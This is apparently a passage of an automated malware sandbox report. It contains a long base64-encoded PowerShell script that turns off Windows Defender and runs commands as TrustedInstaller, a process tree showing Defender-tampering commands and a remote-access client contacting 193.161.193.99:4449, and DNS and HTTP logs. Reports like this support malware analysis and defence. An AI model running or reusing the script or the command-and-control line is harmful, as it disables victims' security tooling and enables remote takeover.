D0AMAA7ACAAdwBoAGkAbABlACgAJABiAHAAYQBzAHMALgBTAHQAYQB0AGUAIAAtAGcAdAAgADMAIAAtAGEAbgBkACAAJAB3AGEAaQB0ACAALQBsAHQAIAAxADcAKQB7AHMAbABlAGUAcAAgAC0AbQAgADEAMAAwADsAIAAkAHcAYQBpAHQAKwA9ADAALgAxAH0ADQAKACAAIABpAGYAKABnAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAApAHsAcgBwACAAaABrAGMAdQA6AFwAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAdwBpAG4AZABpAHIAIAAtAGUAYQAgADAAOwBzAHQAYQByAHQAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBhAHIAZwBzACAAJABzAGMAcgBpAHAAdAAgAC0AdgBlAHIAYgAgAHIAdQBuAGEAcwAgAC0AdwBpAG4AIAAxAH0AOwBiAHIAZQBhAGsADQAKAH0ADQAKAGkAZgAgACgAJAB1ACAALQBlAHEAIAAyACkAIAB7AA0ACgAgACAAJABBAD0AWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMAQQBzAHMAZQBtAGIAbAB5ACIAKAAxACwAMQApAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMATQBvAGQAdQBsAGUAIgAoADEAKQA7ACQARAA9AEAAKAApADsAMAAuAC4ANQB8ACUAewAkAEQAKwA9ACQAQQAuACIARABlAGYAYABpAG4AZQBUAHkAcABlACIAKAAnAEEAJwArACQAXwAsAA0ACgAgACAAMQAxADcAOQA5ADEAMwAsAFsAVgBhAGwAdQBlAFQAeQBwAGUAXQApAH0AIAA7ADQALAA1AHwAJQB7ACQARAArAD0AJABEAFsAJABfAF0ALgAiAE0AYQBrAGAAZQBCAHkAUgBlAGYAVAB5AHAAZQAiACgAKQB9ACAAOwAkAEkAPQBbAEkAbgB0ADMAMgBdADsAJABKAD0AIgBJAG4AdABgAFAAdAByACIAOwAkAFAAPQAkAEkALgBtAG8AZAB1AGwAZQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4AJABKACIAKQA7ACAAJABGAD0AQAAoADAAKQANAAoAIAAgACQARgArAD0AKAAkAFAALAAkAEkALAAkAFAAKQAsACgAJABJACwAJABJACwAJABJACwAJABJACwAJABQACwAJABEAFsAMQBdACkALAAoACQASQAsACQAUAAsACQAUAAsACQAUAAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsAFsASQBuAHQAMQA2AF0ALABbAEkAbgB0ADEANgBdACwAJABQACwAJABQACwAJABQACwAJABQACkALAAoACQARABbADMAXQAsACQAUAApACwAKAAkAFAALAAkAFAALAAkAEkALAAkAEkAKQANAAoAIAAgACQAUwA9AFsAUwB0AHIAaQBuAGcAXQA7ACAAJAA5AD0AJABEAFsAMABdAC4AIgBEAGUAZgBgAGkAbgBlAFAASQBuAHYAbwBrAGUATQBlAHQAaABvAGQAIgAoACcAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAnACwAIgBrAGUAcgBuAGUAbABgADMAMgAiACwAOAAyADEANAAsADEALAAkAEkALABAACgAJABTACwAJABTACwAJABJACwAJABJACwAJABJACwAJABJACwAJABJACwAJABTACwAJABEAFsANgBdACwAJABEAFsANwBdACkALAAxACwANAApAA0ACgAgACAAMQAuAC4ANQB8ACUAewAkAGsAPQAkAF8AOwAkAG4APQAxADsAJABGAFsAJABfAF0AfAAlAHsAJAA5AD0AJABEAFsAJABrAF0ALgAiAEQAZQBmAGAAaQBuAGUARgBpAGUAbABkACIAKAAnAGYAJwArACQAbgArACsALAAkAF8ALAA2ACkAfQB9ADsAJABUAD0AQAAoACkAOwAwAC4ALgA1AHwAJQB7ACQAVAArAD0AJABEAFsAJABfAF0ALgAiAEMAcgBgAGUAYQB0AGUAVAB5AHAAZQAiACgAKQA7ACQAWgA9AFsAdQBpAG4AdABwAHQAcgBdADoAOgBzAGkAegBlAA0ACgAgACAAbgB2ACAAKAAnAFQAJwArACQAXwApACgAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAFQAWwAkAF8AXQApACkAfQA7ACAAJABIAD0AJABJAC4AbQBvAGQAdQBsAGUALgBHAGUAdABUAHkAcABlACgAIgBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAGAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAYABzAGgAYQBsACIAKQA7AA0ACgAgACAAJABXAFAAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAVwByAGkAdABlACQASgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABKACwAJABKACkAKQA7ACAAJABIAEcAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAQQBsAGwAbwBjAEgAYABHAGwAbwBiAGEAbAAiACwAWwB0AHkAcABlAFsAXQBdACcAaQBuAHQAMwAyACcAKQA7ACAAJAB2AD0AJABIAEcALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAWgApAA0ACgAgACAAJwBUAHIAdQBzAHQAZQBkAEkAbgBzAHQAYQBsAGwAZQByACcALAAnAGwAcwBhAHMAcwAnAHwAJQB7AGkAZgAoACEAJABwAG4AKQB7AG4AZQB0ADEAIABzAHQAYQByAHQAIAAkAF8AIAAyAD4AJgAxACAAPgAkAG4AdQBsAGwAOwAkAHAAbgA9AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABQAHIAbwBjAGUAcwBzAGUAcwBCAHkATgBhAG0AZQAoACQAXwApAFsAMABdADsAfQB9AA0ACgAgACAAJABXAFAALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAkAHYALAAkAHAAbgAuAEgAYQBuAGQAbABlACkAKQA7ACAAJABTAFoAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAUwBpAHoAZQBPAGYAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAHQAeQBwAGUAJwApADsAIAAkAFQAMQAuAGYAMQA9ADEAMwAxADAANwAyADsAIAAkAFQAMQAuAGYAMgA9ACQAWgA7ACAAJABUADEALgBmADMAPQAkAHYAOwAgACQAVAAyAC4AZgAxAD0AMQANAAoAIAAgACQAVAAyAC4AZgAyAD0AMQA7ACQAVAAyAC4AZgAzAD0AMQA7ACQAVAAyAC4AZgA0AD0AMQA7ACQAVAAyAC4AZgA2AD0AJABUADEAOwAkAFQAMwAuAGYAMQA9ACQAUwBaAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFQAWwA0AF0AKQA7ACQAVAA0AC4AZgAxAD0AJABUADMAOwAkAFQANAAuAGYAMgA9ACQASABHAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFMAWgAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABUAFsAMgBdACkAKQANAAoAIAAgACQASAAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAIgBTAHQAcgB1AGMAdAB1AHIAZQBUAG8AYABQAHQAcgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABEAFsAMgBdACwAJABKACwAJwBiAG8AbwBsAGUAYQBuACcAKQApAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALABAACgAKAAkAFQAMgAtAGEAcwAgACQARABbADIAXQApACwAJABUADQALgBmADIALAAkAGYAYQBsAHMAZQApACkAOwAkAHcAaQBuAGQAbwB3AD0AMAB4ADAARQAwADgAMAA2ADAAMAANAAoAIAAgACQAOQA9ACQAVABbADAAXQAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAJwBDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAQAAoACQAbgB1AGwAbAAsACQAYwBtAGQALAAwACwAMAAsADAALAAkAHcAaQBuAGQAbwB3ACwAMAAsACQAbgB1AGwAbAAsACgAJABUADQALQBhAHMAIAAkAEQAWwA0AF0AKQAsACgAJABUADUALQBhAHMAIAAkAEQAWwA1AF0AKQApACkAOwAgAGIAcgBlAGEAawANAAoAfQANAAoADQAKACQAdwBkAHAAPQAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAnAA0ACgAnACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcALAAnAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACwAJwBcAE0AcABFAG4AZwBpAG4AZQAnACwAJwBcAFMAcAB5AG4AZQB0ACcALAAnAFwAUgBlAGEAbAAtAFQAaQBtAGUAIABQAHIAbwB0AGUAYwB0AGkAbwBuACcAIAB8ACUAIAB7AG4AaQAgACgAJAB3AGQAcAArACQAXwApAC0AZQBhACAAMAB8AG8AdQB0AC0AbgB1AGwAbAB9AA0ACgANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACAATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AXwBTAHUAcABwAHIAZQBzAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcAIABEAGkAcwBhAGIAbABlAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtACcAIABFAG4AYQBiAGwAZQBTAG0AYQByAHQAUwBjAHIAZQBlAG4AIAAwACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACcAIABEAGkAcwBhAGIAbABlAEEAbgB0AGkAUwBwAHkAdwBhAHIAZQAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBuAGUAdAAxACAAcwB0AG8AcAAgAHcAaQBuAGQAZQBmAGUAbgBkAA0ACgBzAGMALgBlAHgAZQAgAGMAbwBuAGYAaQBnACAAdwBpAG4AZABlAGYAZQBuAGQAIABkAGUAcABlAG4AZAA9ACAAUgBwAGMAUwBzAC0AVABPAEcARwBMAEUADQAKAGsAaQBsAGwAIAAtAE4AYQBtAGUAIABNAHAAQwBtAGQAUgB1AG4AIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwB0AGEAcgB0ACAAKAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKwAnAFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAE0AcABDAG0AZABSAHUAbgAuAGUAeABlACcAKQAgAC0AQQByAGcAIAAnAC0ARABpAHMAYQBiAGwAZQBTAGUAcgB2AGkAYwBlACcAIAAtAHcAaQBuACAAMQANAAoAZABlAGwAIAAoACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKwAnAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAUwBjAGEAbgBzAFwAbQBwAGUAbgBnAGkAbgBlAGQAYgAuAGQAYgAnACkAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAgACAAIAAgACAAIAAgACAAIAAgACAAIwAjACAAQwBvAG0AbQBlAG4AdABlAGQAIAA9ACAAawBlAGUAcAAgAHMAYwBhAG4AIABoAGkAcwB0AG8AcgB5AA0ACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABIAGkAcwB0AG8AcgB5AFwAUwBlAHIAdgBpAGMAZQAnACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAJwBAACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAAOwAgAGkAZQB4ACgAKABnAHAAIABSAGUAZwBpAHMAdAByAHkAOgA6AEgASwBFAFkAXwBVAHMAZQByAHMAXABTAC0AMQAtADUALQAyADEAKgBcAFYAbwBsAGEAdABpAGwAZQAqACAAVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACAALQBlAGEAIAAwACkAWwAwAF0ALgBUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAKQANAAoAIwAtAF8ALQAjAA==
                                                                              2⤵
                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                              PID:6872
                                                                              • C:\Windows\system32\sc.exe
                                                                                "C:\Windows\system32\sc.exe" qc windefend
                                                                                3⤵
                                                                                • Launches sc.exe
                                                                                PID:4464
                                                                              • C:\Windows\system32\cmd.exe
                                                                                "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                                                                                3⤵
                                                                                  PID:6676
                                                                                • C:\Windows\system32\whoami.exe
                                                                                  "C:\Windows\system32\whoami.exe" /groups
                                                                                  3⤵
                                                                                    PID:6580
                                                                                  • C:\Windows\system32\net1.exe
                                                                                    "C:\Windows\system32\net1.exe" start TrustedInstaller
                                                                                    3⤵
                                                                                      PID:6544
                                                                                  • C:\Windows\explorer.exe
                                                                                    "C:\Windows\explorer.exe"
                                                                                    2⤵
                                                                                    • Modifies registry class
                                                                                    PID:1664
                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Default 127.0.0.1,193.161.193.99 4449 HVNC_MUTEX
                                                                                    2⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:5444
                                                                                • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                  1⤵
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:2768
                                                                                • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                  1⤵
                                                                                  • Modifies Internet Explorer settings
                                                                                  • Modifies registry class
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:4924
                                                                                • C:\Windows\System32\CompPkgSrv.exe
                                                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                  1⤵
                                                                                    PID:4168
                                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                    1⤵
                                                                                      PID:4076
                                                                                    • C:\Users\Admin\AppData\Local\Temp\Client.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\Client.exe
                                                                                      1⤵
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:3332
                                                                                    • C:\Windows\servicing\TrustedInstaller.exe
                                                                                      C:\Windows\servicing\TrustedInstaller.exe
                                                                                      1⤵
                                                                                        PID:5388
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
                                                                                          2⤵
                                                                                          • Modifies Windows Defender Real-time Protection settings
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Modifies data under HKEY_USERS
                                                                                          PID:5116
                                                                                          • C:\Windows\system32\sc.exe
                                                                                            "C:\Windows\system32\sc.exe" qc windefend
                                                                                            3⤵
                                                                                            • Launches sc.exe
                                                                                            PID:4076
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                                                                                            3⤵
                                                                                              PID:1140
                                                                                            • C:\Windows\system32\whoami.exe
                                                                                              "C:\Windows\system32\whoami.exe" /groups
                                                                                              3⤵
                                                                                                PID:3640
                                                                                              • C:\Windows\system32\net1.exe
                                                                                                "C:\Windows\system32\net1.exe" stop windefend
                                                                                                3⤵
                                                                                                  PID:4036
                                                                                                • C:\Windows\system32\sc.exe
                                                                                                  "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
                                                                                                  3⤵
                                                                                                  • Launches sc.exe
                                                                                                  PID:3876
                                                                                            • C:\Windows\system32\NOTEPAD.EXE
                                                                                              "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\UnprotectDisconnect.txt
                                                                                              1⤵
                                                                                              • Opens file in notepad (likely ransom note)
                                                                                              PID:3152
                                                                                            • C:\Users\Admin\AppData\Local\Temp\Client.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\Client.exe
                                                                                              1⤵
                                                                                                PID:2440
                                                                                              • C:\Windows\system32\NOTEPAD.EXE
                                                                                                "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\New Text Document.txt
                                                                                                1⤵
                                                                                                  PID:3588

                                                                                                Network

                                                                                                • flag-us
                                                                                                  DNS
                                                                                                  8.8.8.8.in-addr.arpa
                                                                                                  Remote address:
                                                                                                  8.8.8.8:53
                                                                                                  Request
                                                                                                  8.8.8.8.in-addr.arpa
                                                                                                  IN PTR
                                                                                                  Response
                                                                                                  8.8.8.8.in-addr.arpa
                                                                                                  IN PTR
                                                                                                  dnsgoogle
                                                                                                • flag-us
                                                                                                  DNS
                                                                                                  104.219.191.52.in-addr.arpa
                                                                                                  Remote address:
                                                                                                  8.8.8.8:53
                                                                                                  Request
                                                                                                  104.219.191.52.in-addr.arpa
                                                                                                  IN PTR
                                                                                                  Response
                                                                                                • flag-us
                                                                                                  DNS
                                                                                                  172.210.232.199.in-addr.arpa
                                                                                                  Remote address:
                                                                                                  8.8.8.8:53
                                                                                                  Request
                                                                                                  172.210.232.199.in-addr.arpa
                                                                                                  IN PTR
                                                                                                  Response
                                                                                                • flag-us
                                                                                                  DNS
                                                                                                  72.32.126.40.in-addr.arpa
                                                                                                  Remote address:
                                                                                                  8.8.8.8:53
                                                                                                  Request
                                                                                                  72.32.126.40.in-addr.arpa
                                                                                                  IN PTR
                                                                                                  Response
                                                                                                • flag-us
                                                                                                  DNS
                                                                                                  95.221.229.192.in-addr.arpa
                                                                                                  Remote address:
                                                                                                  8.8.8.8:53
                                                                                                  Request
                                                                                                  95.221.229.192.in-addr.arpa
                                                                                                  IN PTR
                                                                                                  Response
                                                                                                • flag-us
                                                                                                  DNS
                                                                                                  99.193.161.193.in-addr.arpa
                                                                                                  Remote address:
                                                                                                  8.8.8.8:53
                                                                                                  Request
                                                                                                  99.193.161.193.in-addr.arpa
                                                                                                  IN PTR
                                                                                                  Response
                                                                                                • flag-us
                                                                                                  DNS
                                                                                                  58.55.71.13.in-addr.arpa
                                                                                                  Remote address:
                                                                                                  8.8.8.8:53
                                                                                                  Request
                                                                                                  58.55.71.13.in-addr.arpa
                                                                                                  IN PTR
                                                                                                  Response
                                                                                                • flag-us
                                                                                                  DNS
                                                                                                  154.239.44.20.in-addr.arpa
                                                                                                  Remote address:
                                                                                                  8.8.8.8:53
                                                                                                  Request
                                                                                                  154.239.44.20.in-addr.arpa
                                                                                                  IN PTR
                                                                                                  Response
                                                                                                • flag-us
                                                                                                  DNS
                                                                                                  200.163.202.172.in-addr.arpa
                                                                                                  Remote address:
                                                                                                  8.8.8.8:53
                                                                                                  Request
                                                                                                  200.163.202.172.in-addr.arpa
                                                                                                  IN PTR
                                                                                                  Response
                                                                                                • flag-us
                                                                                                  DNS
                                                                                                  171.39.242.20.in-addr.arpa
                                                                                                  Remote address:
                                                                                                  8.8.8.8:53
                                                                                                  Request
                                                                                                  171.39.242.20.in-addr.arpa
                                                                                                  IN PTR
                                                                                                  Response
                                                                                                • flag-us
                                                                                                  DNS
                                                                                                  60.153.16.2.in-addr.arpa
                                                                                                  Remote address:
                                                                                                  8.8.8.8:53
                                                                                                  Request
                                                                                                  60.153.16.2.in-addr.arpa
                                                                                                  IN PTR
                                                                                                  Response
                                                                                                  60.153.16.2.in-addr.arpa
                                                                                                  IN PTR
                                                                                                  a2-16-153-60deploystaticakamaitechnologiescom
                                                                                                • flag-us
                                                                                                  DNS
                                                                                                  11.227.111.52.in-addr.arpa
                                                                                                  Remote address:
                                                                                                  8.8.8.8:53
                                                                                                  Request
                                                                                                  11.227.111.52.in-addr.arpa
                                                                                                  IN PTR
                                                                                                  Response
                                                                                                • flag-us
                                                                                                  DNS
                                                                                                  google.com
                                                                                                  PING.EXE
                                                                                                  Remote address:
                                                                                                  8.8.8.8:53
                                                                                                  Request
                                                                                                  google.com
                                                                                                  IN A
                                                                                                  Response
                                                                                                  google.com
                                                                                                  IN A
                                                                                                  142.250.180.14
                                                                                                • flag-us
                                                                                                  DNS
                                                                                                  www.google.com
                                                                                                  msedge.exe
                                                                                                  Remote address:
                                                                                                  8.8.8.8:53
                                                                                                  Request
                                                                                                  www.google.com
                                                                                                  IN A
                                                                                                  Response
                                                                                                  www.google.com
                                                                                                  IN A
                                                                                                  142.250.187.196
                                                                                                • flag-gb
                                                                                                  GET
                                                                                                  https://www.google.com/
                                                                                                  msedge.exe
                                                                                                  Remote address:
                                                                                                  142.250.187.196:443
                                                                                                  Request
                                                                                                  GET / HTTP/2.0
                                                                                                  host: www.google.com
                                                                                                  sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                  dnt: 1
                                                                                                  upgrade-insecure-requests: 1
                                                                                                  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                  accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                  sec-fetch-site: none
                                                                                                  sec-fetch-mode: navigate
                                                                                                  sec-fetch-user: ?1
                                                                                                  sec-fetch-dest: document
                                                                                                  accept-encoding: gzip, deflate, br
                                                                                                  accept-language: en-US,en;q=0.9
                                                                                                  Response
                                                                                                  HTTP/2.0 429
                                                                                                  date: Fri, 10 Jan 2025 15:13:10 GMT
                                                                                                  pragma: no-cache
                                                                                                  expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                  cache-control: no-store, no-cache, must-revalidate
                                                                                                  content-type: text/html
                                                                                                  server: HTTP server (unknown)
                                                                                                  content-length: 3078
                                                                                                  content-type: text/html
                                                                                                  content-length: 3078
                                                                                                • flag-gb
                                                                                                  GET
                                                                                                  https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS117BTGIbyhLwGIjC0HOxmfUNgMHzKZ07tC5p1mghTr4Ylzf0ka5zBQuY_mu6QzDQjKljPjXZhUzTx2vQyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                  msedge.exe
                                                                                                  Remote address:
                                                                                                  142.250.187.196:443
                                                                                                  Request
                                                                                                  GET /sorry/index?continue=https://www.google.com/&q=EgS117BTGIbyhLwGIjC0HOxmfUNgMHzKZ07tC5p1mghTr4Ylzf0ka5zBQuY_mu6QzDQjKljPjXZhUzTx2vQyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/2.0
                                                                                                  host: www.google.com
                                                                                                  dnt: 1
                                                                                                  upgrade-insecure-requests: 1
                                                                                                  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                                                                                  accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                  sec-fetch-site: none
                                                                                                  sec-fetch-mode: navigate
                                                                                                  sec-fetch-user: ?1
                                                                                                  sec-fetch-dest: document
                                                                                                  sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                  accept-encoding: gzip, deflate, br
                                                                                                  accept-language: en-US,en;q=0.9
                                                                                                  cookie: AEC=AZ6Zc-Xvv63SM4RIPET1kCS1GDIa4AreqUTNd7pIUh2_54jbZPRENHzDjdk
                                                                                                  cookie: __Secure-ENID=24.SE=Cjahek_RxIqtalrYZZcOFW0EHtiBHH2Sk3HvKeGWyfLjeyaG_nbxa2p214YwEc4pSFe2iXlcWChpmYRX3qUYfrMiZvCYHalvVK4y1EBHU3lAWuDRCdSc0iVgap5JiudgvGwb1u1mZIPjdlVCr3gbRShZvc0rgQrLt-uPjML-YHI5eNEQ9z-A20gLMvfZm0oCiPqYnCUB
                                                                                                • flag-us
                                                                                                  DNS
                                                                                                  196.187.250.142.in-addr.arpa
                                                                                                  Remote address:
                                                                                                  8.8.8.8:53
                                                                                                  Request
                                                                                                  196.187.250.142.in-addr.arpa
                                                                                                  IN PTR
                                                                                                  Response
                                                                                                  196.187.250.142.in-addr.arpa
                                                                                                  IN PTR
                                                                                                  lhr25s33-in-f41e100net
                                                                                                • flag-us
                                                                                                  DNS
                                                                                                  134.32.126.40.in-addr.arpa
                                                                                                  Remote address:
                                                                                                  8.8.8.8:53
                                                                                                  Request
                                                                                                  134.32.126.40.in-addr.arpa
                                                                                                  IN PTR
                                                                                                  Response
                                                                                                • flag-us
                                                                                                  DNS
